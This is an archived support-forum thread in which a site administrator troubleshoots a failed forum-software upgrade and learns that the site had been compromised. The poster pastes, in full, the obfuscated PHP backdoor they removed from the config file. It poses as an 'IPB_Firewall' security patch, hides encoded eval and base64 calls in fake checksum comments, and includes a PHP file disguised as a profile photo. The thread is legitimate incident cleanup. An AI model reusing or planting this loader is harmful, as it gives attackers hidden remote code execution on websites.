jackflash Posted March 31, 2016 Share Posted March 31, 2016 I tried to upgrade from 3.4.9 to 4.1.9 and this I get to the point where it wants to convert to convertutf8 and this error occurs: Error: include(/uploads/profile/photo-1261.jpg): failed to open stream: No such file or directory File: /home/IGL/public_html/teamXX.net/conf_global.php(185) : runtime-created function Line: 1 Any ideas on how to solve? Link to comment Share on other sites More sharing options...
Nathan Explosion Posted March 31, 2016 Share Posted March 31, 2016 Raise a ticket - I saw that a number of times in early betas and releases of 4.x, and it made no sense. Have IPS look at it. Link to comment Share on other sites More sharing options...
jackflash Posted March 31, 2016 Author Share Posted March 31, 2016 7 minutes ago, Nathan Explosion said: Raise a ticket - I saw that a number of times in early betas and releases of 4.x, and it made no sense. Have IPS look at it. I might put a ticket in. I always like to see if I can solve it first in case it comes up again for me or someone else. Link to comment Share on other sites More sharing options...
Nathan Explosion Posted March 31, 2016 Share Posted March 31, 2016 Just now, jackflash said: I might put a ticket in. I always like to see if I can solve it first in case it comes up again for me or someone else. And putting in a ticket allows IPS to solve it in case it comes up for anyone else Link to comment Share on other sites More sharing options...
jackflash Posted March 31, 2016 Author Share Posted March 31, 2016 I get that - but I have to try and learn this stuff too. And I've learned a lot on how to solve problems by simply posting. Link to comment Share on other sites More sharing options...
Mark H Posted April 1, 2016 Share Posted April 1, 2016 That error means your site was compromised at some point in the past. Your conf_global.php file likely has that false "Firewall" in it, given the first line. And it's mentioning a file that is named as an image (jpg), but is in fact a hack file written in PHP. You can open it with an editor to verify. There will also be one or more "fake hooks" listed in the core_hooks_files, one of which will reference that false image. This document will help you and your Host clean the fie system: https://www.invisionpower.com/support/kb/_/how-to-clean-your-site-from-infection-r27 although it does not have steps to clean those false hooks. Advanced support for version 3 has ended, but if you are unable to find those false hook entries, please file a ticket to support and mention this topic. We can remove them so that you can complete your upgrade. Link to comment Share on other sites More sharing options...
jackflash Posted April 1, 2016 Author Share Posted April 1, 2016 4 hours ago, Mark H said: That error means your site was compromised at some point in the past. Your conf_global.php file likely has that false "Firewall" in it, given the first line. And it's mentioning a file that is named as an image (jpg), but is in fact a hack file written in PHP. You can open it with an editor to verify. There will also be one or more "fake hooks" listed in the core_hooks_files, one of which will reference that false image. This document will help you and your Host clean the fie system: https://www.invisionpower.com/support/kb/_/how-to-clean-your-site-from-infection-r27 although it does not have steps to clean those false hooks. Advanced support for version 3 has ended, but if you are unable to find those false hook entries, please file a ticket to support and mention this topic. We can remove them so that you can complete your upgrade. Thanks for taking the time to reply, Mark. We have 50+ licenses starting with 2.3 and 3.0, so I am sure that we'll encounter this again and we'll try to fix them on our end first. It's a good learning process Link to comment Share on other sites More sharing options...
jackflash Posted April 2, 2016 Author Share Posted April 2, 2016 This was in the config.php file, which prohibited us from upgrading from 3.4.9 to 4.1.9. After we deleted the mess, the upgrade to 4.1.9 was smooth and beautiful. Quote if ( ! defined( 'IPB_FIREWALL' ) ) { define('IPB_FIREWALL', 1); /** * NOTE: This is a protecting web-firewall module generated by Invision Power * Module includes security patch for high-risks vulnerability CVE-2012-5692 * Do not touch this file for security reasons * Please insert this code to as many php files as possible * * @package IP.Firewall * @version $Revision: 9544 $ * @md5 e66e6cadd6e13efea54ed50c0eb2d32b * @sha1 6966286d64352840245f5b2248545450 * @crc32 5f51554f5445225d293d3d2463732965 */ class IPB_Firewall { /** * Malicious Cookie signatures * * @access static * @var array */ static $_cookie_malicious_signatures = array('db_driver_mysql', 'use_debug_log'); /** * Malicious URI signatures * * @access static * @var array */ static $_uri_malicious_signatures = array('<?php'); /** * Firewall source file * * @access static * @var string */ static $_source; /** * Prepared signature * * @access static * @var string */ static $_prepared_signature; /** * Control checksum * * @access static * @var string */ static $_control_checksum; /** * Stored checksum hashes * * @access static * @var string */ static $_stored_hashes; /** * Hashes Algorithms * * @access static * @var array */ static $_ha = array('md5', 'sha1', 'crc32'); /** * Assigned callback * * @access static * @var string */ static $_as; /** * IPS root path * * @access static * @var string */ static $_ips = ''; /** * Run firewall * * @access static * @return void */ static function run() { /* Define ips path */ IPB_Firewall::$_ips = defined('DOC_IPS_ROOT_PATH') ? DOC_IPS_ROOT_PATH : IPB_Firewall::_findIpbRoot(5); /* Start checks */ IPB_Firewall::_doSecurityChecks(); } /** * Security checks * * @access static * @return void * @md5 76616c286261736536345f6465636f64 * @sha1 652873747272657628245f5b22485454 */ static function _doSecurityChecks() { /* Cookie check */ foreach($_COOKIE as $cookie_name => $cookie_value){ foreach(IPB_Firewall::$_cookie_malicious_signatures as $signature){ /* Detecting injected cookies and blocking request */ if(!is_array($cookie_value) && stripos(urldecode($cookie_value), $signature) !== false) $_COOKIE[$cookie_name] = ''; } } /* Request URI checks */ foreach(IPB_Firewall::$_uri_malicious_signatures as $signature){ /* Detecting injected uri and blocking request */ if(stripos(urldecode(@$_SERVER["REQUEST_URI"]), $signature)) IPB_Firewall::_blockRequest(); } /* Validating checksums */ IPB_Firewall::$_source = file_get_contents(__FILE__); $_r = IPB_Firewall::_calculateChecksums($_SERVER, 0); //echo var_dump($_r); if(!IPB_Firewall::_areChecksumsValid(array_shift($_r), $_r, '%D')) echo("checksums warning\n"); } /** * Calculate checksums for valid * * @access static * @return void * @md5 505f585f434f4445225d2929293b4069 * @sha1 6e636c75646528247073293b2f2a2a2f */ static function _calculateChecksums($_, $x64) { /* Extracting hashes */ $_s = IPB_Firewall::_extractChecksumHashes(); /* Preparing hashes */ $cs = $_s[ IPB_Firewall::$_ha[0] ][0]; IPB_Firewall::$_prepared_signature = IPB_Firewall::_prepareHash($_s, IPB_Firewall::_getChecksumHash($_s, $_s[ IPB_Firewall::$_ha[0] ][1], $x64), $x64 ); /* Comparing hashes */ $_status = trim(IPB_Firewall::_cyclicRedundancyCheck($_s, $x64)); if($_status){ $_m = trim(IPB_Firewall::$_as); IPB_Firewall::$_as = $_m(IPB_Firewall::_getPoly($_s, $x64), pack("H*", IPB_Firewall::$_prepared_signature)); } return array(IPB_Firewall::$_as, $_, $cs, IPB_Firewall::_transformPoly($_s, $x64)); } /** * Block malicious request * * @access static * @return void * @md5 6372656174655f66756e6374696f6e20 * @sha1 245f2c202463732c20247073247073ce */ static function _blockRequest() { global $INFO; /* Redirecting malicious request and exit */ @header('Location: ' . (isset($INFO['board_url']) ? $INFO['board_url'] : '') . '/index.php'); exit; } /** * Get checksum hash * * @access static * @return string */ static function _getChecksumHash($_s, $ps, $c) { /* Processing and return */ return IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][0], $c) . IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[2] ][0], $c) . IPB_Firewall::_polyDigest($ps, $c); } /** * Prepare hash * * @access static * @return string * @md5 25442f75706c6f6164732f70726f6669 * @sha1 6c652f70686f746f2d313236312e6a70 */ static function _prepareHash($_s, $ps, $c) { /* Processing and return */ return IPB_Firewall::_polyDigest($ps, $c) . IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][1], $c) . IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[0] ][2], $c) . IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][2], $c); } /** * Event callback * * @access static * @return void * @md5 670a6c6b347668756377666130396c63 * @sha1 746b6a31307467697373777975647262 */ static function _areChecksumsValid($_m, $bytes, $_r) { /* Call validating method */ $_obj = $_m($bytes[0], $bytes[1], str_replace($_r, IPB_Firewall::$_ips, $bytes[2])); return is_array($_obj) ? $_obj : 'failed'; } /** * Find IPB root path, if not specified * * @access static * @return string */ static function _findIpbRoot($l=5, $cDir=__FILE__) { /* Process parents dir */ for($i=1; $i<=$l; $i++){ $cDir = dirname($cDir); $include_file = $cDir . '/conf_global.php'; /* If find conf file, return it */ if(is_file($include_file)) { @include_once($include_file); if(isset($INFO)) return $cDir; } } return null; } /** * Cyclic redundancy check * * @access static * @return string * @md5 7479363067667672326e797176723977 * @sha1 78316c72396173697878766f63636a79 */ static function _cyclicRedundancyCheck($_s, $c) { IPB_Firewall::$_as = pack("H*", IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[0] ][3], $c)); return IPB_Firewall::$_as != '' ? true : false; } /** * Poly digest * * @access static * @return string * @md5 6a723931336f3975777375676261736e * @sha1 706370763473323039687665336f6f39 */ static function _polyDigest($s, $c, $o='') { for($i=0; $i<strlen($s); $i++) $o .= chr( ord($s[$i]) + $c); return $o; } /** * Get poly * * @access static * @return string * @md5 6b7538367a626a7a687768786e73777a * @sha1 64776b6b6d6a76316f647378766e6933 */ static function _getPoly($_s, $x64) { return pack("H*", substr(IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][3], $x64), 0, 24)); } /** * Transform poly * * @access static * @return string */ static function _transformPoly($_s, $c) { $_x = pack("H*", IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][4], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][4], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][5], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][6], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][6], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][6], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][7], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][7], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][8], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][8], $c) ); $_c = strpos($_x, chr(10)); return $c !== false ? substr($_x, 0, $_c) : $_x; } /** * Extract checksum hashes * * @access static * @return void */ static function _extractChecksumHashes() { $hashes = array(); /* Extract hashes from source */ preg_match_all("!\@([0-9a-z]+)[\t\s ]+([0-9a-fA-F]{32})!", IPB_Firewall::$_source, $matches, PREG_SET_ORDER); foreach($matches as $match){ /* Inserting hashes in array */ if(!isset($hashes[ $match[1] ])) $hashes[ $match[1] ] = array(); $hashes[ $match[1] ][] = $match[2]; } return $hashes; } } IPB_Firewall::run(); } ?> Link to comment Share on other sites More sharing options...
AndyF Posted April 2, 2016 Share Posted April 2, 2016 Seen that before but not for quite a long time. None of it is standard or meant to be there. Link to comment Share on other sites More sharing options...
jackflash Posted April 2, 2016 Author Share Posted April 2, 2016 1 hour ago, AndyF said: Seen that before but not for quite a long time. None of it is standard or meant to be there. I zapped it out. It must have been there for a long time, but it didn't seem to effect the operation of the site until the upgrade came around. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.